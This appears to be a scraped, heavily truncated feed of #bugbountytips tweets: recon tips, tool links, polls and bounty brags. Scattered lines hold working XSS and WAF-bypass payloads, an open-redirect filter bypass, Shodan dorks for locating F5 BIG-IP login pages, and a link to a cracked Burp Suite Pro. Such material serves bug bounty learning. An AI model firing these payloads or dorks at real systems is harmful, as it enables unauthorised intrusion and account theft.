So posting this poll.
What was the most exciting bug you've ever found?
Doesn't necessarily need to be your highest paid bug!
Vote and comment down below
#bugbounty #hacking #bugbountytips #bugbountytip
#infosec Hashtags for reach XD
Bug bounty tip: don’t tweet useless bug bounty tips
#bugbountytips
RT @Jhaddix: Sunday Night #BugBounty #bugbountytips
1 Stored XSS
1 Reflected XSS
1 Admin Panel exposed to interwebz
1 potentially sensitive video exposed to the pub internet
Remember to check/search security-related GitHub issues for the frameworks you run a
RT @ehsayaan: I was very inconsistent about what should I do when hunting on a progr
#bugbounty #bugbountytips https://t.co/4d4ip9qSor
RT @B3nac: Nice find! 🎉 Here's a adb one liner to list activities. adb shell dumpsys packa
https://t.co/RQqpWyHLPp
RT @GochaOqradze: Post based Cors misconfiguration PoC
#bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
RT @ArmanSameer95: A Tool to find broken links: Broken Link Checker!
Check this out guys
https://t.co/M0458IjFZ2
#bugbounty #bugbountytips #Hacking https://t.co/yq3HM3fTmw
RT @scspcommunity: #Bug #Bounty #Tips part 4!
#bugbounty #bugbountytips #ethicalhacking #hacking #pentesting #PenTest #infosec
https://t.co/bUpmo6t6Oe
RT @sriramoffcl: Access revoked only on Front-end still vulnerable on Back-end !
#BugBounty #bugbountytips #hackerone #bugcrowd
️RT @trbughunters: ️Top 25 Local File Inclusion (LFI) Parameters 🛡️
#bugbountytips #bugbountytip #bugbounty #cybersecurity #infosec #ethicalhacking #
RT @OAcybersecurity: Hackerone CTF XSS Challenge $250 (BugPoc) 2020 https://t.co/K
RT @ExploitedSystem: Hey Guys Just Uploaded a Video Checking it out would mean alot
#cybersecurity #infosec #bugbounty #bugbountytips #ethicalhacking #hacking #passw
RT @AniruddhaKl: Network Protocols
#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip
RT @AndyInfoSec_: Network Protocols
#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip
Subdomain Takeover 101 ..@EdOverflow Great Blog
learn a lot
https://t.co/xAHIs10wiQ
----
#togatherwelearn #bugbountytips
Network Protocols
#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip
Network Protocols
#infosec #cybersecurity #cybersec #networksecurity #vapt #bugbounty #bugbountytip
#bugbounty #bugbountytips People sometimes ask how you can "eyeball" a site and kn
https://t.co/PDGu7IHYk3
Recently, I have started using the tool "Arjun" for finding the hidden parameters, howev
RT @Akshanshjaiswl: I just published my writeup on Pre-Access to Victim’s Account via
#bugbountytips #bugbountytip #bugbounty #infosec
Hey Guys Just Uploaded a Video Checking it out would mean alot ! Make Sure to Like an
#cybersecurity #infosec #bugbounty #bugbountytips #ethicalhacking #hacking #passw
RT @plenumlab: Very useful tool by @TomNomNom
Feed it urls it will give you a list of interesting ones, at least in theory, https://t.co/1GW
#BugBounty #bugbountytips
Bypass I learned from @rene_kroka this week:
https://t.co/SzIavQtyOR
onpointerrawupdate= " A='',B=!A+A,C=!B+A,D=A+{},E=B[A++],F=B[G=A],H=++G+A,
👆 = alert(1)
#bugbounty #bugbountytips
Best way to search Project Sonar database for subdomain enumeration.
https://t.co/t5WYUzjvvp
Credits to @CalumBoal
#bugbountytips
#pentest #pentesting #hacking #bugbounty #bugbountytips #web #KaliLinux #linux #
Access revoked only on Front-end still vulnerable on Back-end !
#BugBounty #bugbountytips #hackerone #bugcrowd
6 steps and 2 tools to attack JSON Web Token
https://t.co/uRHKNn6pSW
https://t.co/PBDNgsjLnh
#hacktory_tools #bugbounty #cybersecurity #bugbountytip #bugbountytips #cybersec
Cache Poisoning on Wordpress --> Stored XSS --> POST "/wp-admin/user-new.ph
Triaged with "High" instead of "Critical" . Don't know what is wrong !
#bugbountytips Tweet has tip as well :D
@andirrahmani1 #bugbountytips
Changed @0xbharath's VirusTotal sub-domains enumeration script. Crawl all the result p
@appseccouk #bugbountytip #bugbounty #recon #bugbountytips
https://t.co/6JXlkUtURd
RT @Digitalsanjog: Content Marketing: India is a country of storytellers. We have storyte
for more just gaze at
https://t.co/fj7v5RvW2z
#storytelling #contentmarketing #contentstrategy #storyteller #bugbountytips #Conte
Content Marketing: India is a country of storytellers. We have storytellers in every field
for more just gaze at
https://t.co/fj7v5RvW2z
#storytelling #contentmarketing #contentstrategy #storyteller #bugbountytips #Conte
RT @Jhaddix: Wednesday Night #BugBounty #bugbountytips
Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates
RT @ssh0x00r: interested in bug bounty ? (free tip by @NahamSec )
LINK IN BIO
#infosec #cybersecurity #hacking #bugbountytips
RT @ssh0x00r: i've been scratching my head for long time, thanks @stok @hakluke for
check this out: https://t.co/5ntEFHHPCz
#hacking #bugbountytips #infosec #motivation
RT @frankmosigisi: What is the best impact if you find
React app api key and want to report it
#bugbounty #bugbountytips
RT @netspooky: #Cloudflare #WAFbypass
Just got a $1000 payout 💵📥
<uu src=@'@' onbigclick=import('//0a"&nbsp;"0a0a?0a/')>mou%09se<|/
#BugBountyTips #bugbountytip #redteam #waf #obfuscation #security #linux #togeth
RT @Nep_1337_1998: To Find #f5 instances
Shodan:
+-+-+-+-+-
F5-Login-Page
WWW-Authenticate: Basic realm=BIG-IP
BigIP
BIG-IP
http.favicon.hash:-335242539
http.title:"BIG-IP&reg;- Redirect"
https://t.co/0n61Dor29y
@dnkolegov #bugbountytips #f5 #recon #infosec @vis_hacker https://t.co/QNCKbIBv4
RT @1m4xx0: https://t.co/dzjyB9hTDN
Made a simple directory search tool using python which will send notification on your Te
Feel free to use the code and modify according to your need!
#BugBounty #bugbountytips #bugbounty #python #redteam
RT @Unknownuser1806: Find #CVEs
https://t.co/wOOxzbydBN
https://t.co/lKvQHEpTHl
https://t.co/n1teetr8Fm
https://t.co/1VBangzPPl
https://t.co/X2wQL3dlax
https://t.co/0Wo6cTaaNK
https://t.co/EE1lHBzVfg
https://t.co/VTeYjVvtYi
https://t.co/ELwT1ILHWG
https://t.co/XBkHfF1rSP
#bugbounty,#bugbountytips
Recon Tip for :
-Subdomain enumeration
-Finding endpoints
-Finding parameters By @0xElkot
#bugbountytips #BugBounty #bugbountytip https://t.co/CAemcyCGQn
Second medium blog-post:
Stealing your Paytm information using XSS by: @VirenPawar_
https://t.co/fPs3KiXFL0
#bugbounty #infosec #bugbountytips #xss #medium #paytm #SharingIsCaring
What is the best impact if you find
React app api key and want to report it
#bugbounty #bugbountytips
i've been scratching my head for long time, thanks @stok @hakluke for a motivation
check this out: https://t.co/5ntEFHHPCz
#hacking #bugbountytips #infosec #motivation
#hacking #BugsBunny #bugbountytips #javabug #CVE
Javabug学习小项目
https://t.co/PISv5OdYWN
RT @pdiscoveryio: Major #update to the public bounty and disclosure programs, we've a
- https://t.co/aLRBoIam6V
#security #recon #bugbounty #bugbountytips #infosec
“How I Hacked My College’s Online Exam Portal During COVID-19 Quarantine Period” by
#bugbountytips
#xploitprotocol
https://t.co/oFpw0k2Yvy
SQLTruncScanner - Scan endpoints for possible SQL Truncation vulnerabilities.
#bugbountytips
#xploitprotocol
https://t.co/tfUPQNlIhO
BurpSuite-Xkeys: A Burp Suite Extension to extract interesting strings (key, secret, toke
#bugbountytips
https://t.co/N4e7DgDRsy
interested in bug bounty ? (free tip by @NahamSec )
LINK IN BIO
#infosec #cybersecurity #hacking #bugbountytips
So happy with my HackerOne stats over these past 90 Days! #BugBounty #HackerOne #
#bugbountytips
Does anyone has list of root domains of all public programs in the BB platforms ?
Could you please share ?
If not I am planning to make one and share
thanks
FORD Session token URL lead to Reflected XSS #bugbountytips #bugbounty #hackerone
RT @disclose_io: New VDPs and #bugbounty programs at https://t.co/JtaCJYPiNA!
Total: 926
Full safe harbor: 126 (13.6%)
Partial safe harbor: 207 (22.4%)
w/ Bounties: 399 (43.1%)
w/ HOF: 593 (64.0%)
w/ Swag: 45 (4.9%)
Missing yours? Submit a PR!
#bugbountytips #infosec #cybersecurity
The biggest takeaways from most talks are things I am already biased towards. Unlearn
Imperva Waf XSS ByPass :
Payload : <sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9
Codepen : https://t.co/ls37WLuqEK
#BugBounty #BugBountyTip #BugBountyTips #WhiteHats https://t.co/fB2kjCvZVn
RT @scspcommunity: #bugbounty tips part 2
#hacking #ethicalhacking #bugbounty #bugbountytip #securitytesting #webapp #pent
https://t.co/4pcPahsC8Z
RT @scspcommunity: Bug Bounty Tips part 3
#bugbountytip #bugbountytips #bugbounty #bughunting #bughunter #hackerone #bug
RT @scspcommunity: Take your #bugbounty game to a higher level with the Bug Bounty
#Pentesting #infosec #cybersecurity #informationsecurity #hacking #ethicalhacker #e
RT @BugBountyWeekly: You can use @hackvertor to generate random IP to bypass rate-
RT @scspcommunity: A little treasure for all you #BugBounty Hunters! 😉
#infosec #informationsecurity #infosecurity #CyberSecurity #cyber #cybersec #PenTes
HOURS & HOURS OF FREE CYBER SECURITY TRAINING??? (im loosing it) https://t
August is going to be.. crazy!
feat: @Hacker0x01 @defcon @redteamvillage @AppSec_Village @Bugcrowd @secarmyof
#bugbounty #bugbountytips #appsec #infosec https://t.co/PAbmt6Zms6
Wednesday Night #BugBounty #bugbountytips
Recording my #hacktivitycon2020 talk tonight, so no hacking. A couple of small updates
RT @william_leeser: #bugbountytips #BugBounty If you are starting now and don't have
This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences
https://t.co/Pzi6NQyjun
#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder
RT @AniruddhaKl: This is a short survey by @AndyInfoSec_ to learn about bug bounty hu
https://t.co/e17U8dPAoy
#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder
This is a short survey by @AndyInfoSec_ to learn about bug bounty hunting preferences
https://t.co/e17U8dPAoy
#infosec #bugbounty #bugbountytips #vapt #cybersec #Hacker #togetherwehitharder
this is baller #bugbountytips https://t.co/V02NNJ4DFR
Technique, Tool and Lecture (TTL) #20
-
-
🤓 Follow @gainsec
-
https://t.co/rvDexPiL6X
-
#Hacking #ethicalhacker #bugbountytips #infosec #pentesting #pentester #cybersecu
RT @FindomainApp: If you're using our services, look for "CODE: 502" and "ERROR: The
RT @mehmetcangunes: I was included in the Hall of Fame by GOOGLE😀
https://t.co/jeo7qLld2R
#bugbounty #infosec #ethicalhacking #CyberSecurity #halloffame #bugbountytips http
RT @_Y000_: Xss payload
-->'"<h1><img src="/" =_=" title="onerror='javascript=pr\u006fmpt`_Y000
#payload #xss #bugbountytips https://t.co/nMGEmCjlkj
RT @TheJulfikar: extract endpoints from JavaScript files by @renniepak
cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | s
#bugbountytips #bugbountytip #bugbounty https://t.co/pzEK1vXePR
RT @UrielYochpaz: I can upload any file to a jetty server
But when i try uploading jsp files i get an Error "Could not initialize org.apache..."
Any help?
#bugbountytips
RT @hsakarp_ilajna: #IDOR_TIPS
1.Extracted url's of application from wayback machine using wayback script.
2.Made a script with custom wordlist to fuzz on obtained url.
3. One of them leaked sensitive content based on #application's workflow.
#bugbountytips #bugbounty #infosec #cybersecurity
RT @bountyhunter_fr: Password reset function token leak
After sending the password reset request, sometimes the reset token is leaked in the HT
#bugbountytips
RT @EvMd15: #bugbountytips #wordpresssecurity #wordpress
List backup file wp-config https://t.co/lbegI0dJuy
#bugbountytips #wordpresssecurity #wordpress
List backup file wp-config https://t.co/lbegI0dJuy
RT @chiraggupta8769: #FREE 2ಠ2ಠ ♥
Burp Suite Professional Edition v2020.7 x64 Full Activated + All Addons – Discount 100%
By @3XS0
Link : https://t.co/d10yTBiWxk
#BurpSuite #bugbounty #bugbountytips https://t.co/2u5MUDv4iD
RT @Jhaddix: Tuesday Night #BugBounty #bugbountytips
Spend about 3 hours hunting. Didn't find anything.
RT @aish_kendle: Last week, collaborated with @thakare_prateek and hijacked 24+ sub
Some tips :
-Enumerate subdomains from multiple tools
-Do check the 404 pages
-Check the cname record
-Automate everything
#bugbounty #bugbountytips #recon https://t.co/Jw2B72QjrW
RT @pdnuclei: # Nuclei templates v2.0.6 updates.
- More CVEs.
- More takeovers.
- More workflows.
https://t.co/HHUvgjcHAq
Shout out to @dwisiswant0, @EdOverflow, adiffpirate, ankh2054,@nahoragg, @Marmela
#infosec #hackwithautomation #bugbountytips #pentest #cybersecurity https://t.co/D
RT @JaggarHenry: Automating thousands of subdomain takeovers for fun and for profit.
https://t.co/nJa0i4kRyt https://t.co/Cwrv1MNCkw
Initial report: Open Redirect+XSS -> Triaged -> Resolved
Check it again and can still "Open Redirect" -> Report and Bounty
The payload: javascript:@youtube.com
Use the ":" character to bypass the filter and "@" to redirect to that domain
#BugBountyTips #BugBounty #ItTakesACrowd https://t.co/PrTMuJqKNA
RT @r0bre: Today I'm releasing JSMon, an automated JS file change monitor for #bugbo
https://t.co/EZFBW3QUuz
Big thanks to @EdOverflow @Yassineaboukir for inspiring this & @TomNomNom @s
#bugbountytip #bugbountytips #hacking #infosec #recon https://t.co/IjTKonoByv
RT @ceos3c: Let's talk about UFW and VPS. Ethical Hacking Diaries #10 now up (video w
https://t.co/tt5gIpElm1
#linux #cybersecurityawareness #cybersecurity #itsecurity #bugbounty #openbugbou
RT @Tismayil1: Yes I awarded 2200$ in Private Program.
USED Repos
Port Scan : https://t.co/H2z9ieqauA
DirSearch : https://t.co/1L6MutcaEc
Backup Scanner : https://t.co/76A96QYjRD
#BugBounty #bugbountytip #bugbountytips #WhiteHats https://t.co/VWF3Txn6K5
RT @t1nd19d: If your looking for flexibility when doing offensif forensic or data manip' ,
#bugbountytips #BugBounty
If your looking for flexibility when doing offensif forensic or data manip' , master regex
#bugbountytips #BugBounty
Password reset function token leak
After sending the password reset request, sometimes the reset token is leaked in the HT
#bugbountytips
Subdomain recon tools step by step :
1) amass - scan for subdomains
2) altdns - compute wordlist with result for new subdomains
3) dnsprobe - check if found subdomain is valid
4) nmap - scan subdomain ports
#bugbountytips
CORS vulnerability
https://t.co/yJL5qKXC8L not working? Try with company.tld
Sometimes the check is only on the domain name without the top level domain that you
#bugbountytips
Bash code for manuel subdomain takeover testing:
cat subdomains.txt | xargs -n1 dig @1.1.1.1 | grep -A10 NXDO | grep CNAME
#BugBounty #bugbountytips #bugbountytip @hacktivist1337
Major #update to the public bounty and disclosure programs, we've added almost 200 n
- https://t.co/aLRBoIam6V
#security #recon #bugbounty #bugbountytips #infosec
RT @xerosecurity: Stay up-to-date with the latest emerging security threats, vulnerabili
#hackers #hacking #bugbounty #bugbountytips #pentesting #pentest #redteam #OSIN
RT @TrainingBug: XSS COOKIE STEALING
https://t.co/6r9hYbiBFs
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
RT @TrainingBug: XSS on non existent parameters
https://t.co/npFTgGQYS2
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
XSS on non existent parameters
https://t.co/npFTgGQYS2
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
XSS COOKIE STEALING
https://t.co/6r9hYbiBFs
#bugbounty #bugbountytips #Hackers #Hacked #ceh #Ethicalhacking #oscp #CTF #xs
one line bash script to get every domain on specific IP
curl -s -k -X $'GET' -H $'Host: https://t.co/L2UFEqV7P7' --url 'https://t.co/nxZ1TBmTS
#bugbountytips #bugbountytip @rapiddns
RT @Shivam31200: A short p1 story inspired by
@ADITYASHENDE17 @Shubham_4500
#bugbounty #bugbountytips https://t.co/SpUQsl5HKM
📡via @securityweekly -pod w/ research recognition 2 @steventseeley 4 @SharePoint R
https://t.co/XBSk8E3WST
#BugBounty #bugbountytips #bugbountytip #Cyber #Security #CyberSecurity #Podcas
RT @ome_mishra: Just scored a bounty of €1000 @intigriti, check my profile: https://t.c
#HackWithIntigriti
#bugbountytips
Always Try Understand the application you will get something cool.... 🤘🏻
Very useful tool by @TomNomNom
Feed it urls it will give you a list of interesting ones, at least in theory, https://t.co/1GW
#BugBounty #bugbountytips
RT @CyberRitesh: #Day11 #Challenge365
1) Critical File Found
2) Source Code Disclosure
3) #tryhackme Challenges
4) WriteUps reading on #bugbounty
#bugbountytips #CyberSecurity
#Day11 #Challenge365
1) Critical File Found
2) Source Code Disclosure
3) #tryhackme Challenges
4) WriteUps reading on #bugbounty
#bugbountytips #CyberSecurity
RT @InsiderPhD: New video!
This week we're answering a question: How do the pros find those CVEs before anyone e
#BugBounty #bugbountytips
https://t.co/MwjjfvHbLC https://t.co/BbM6qe75nx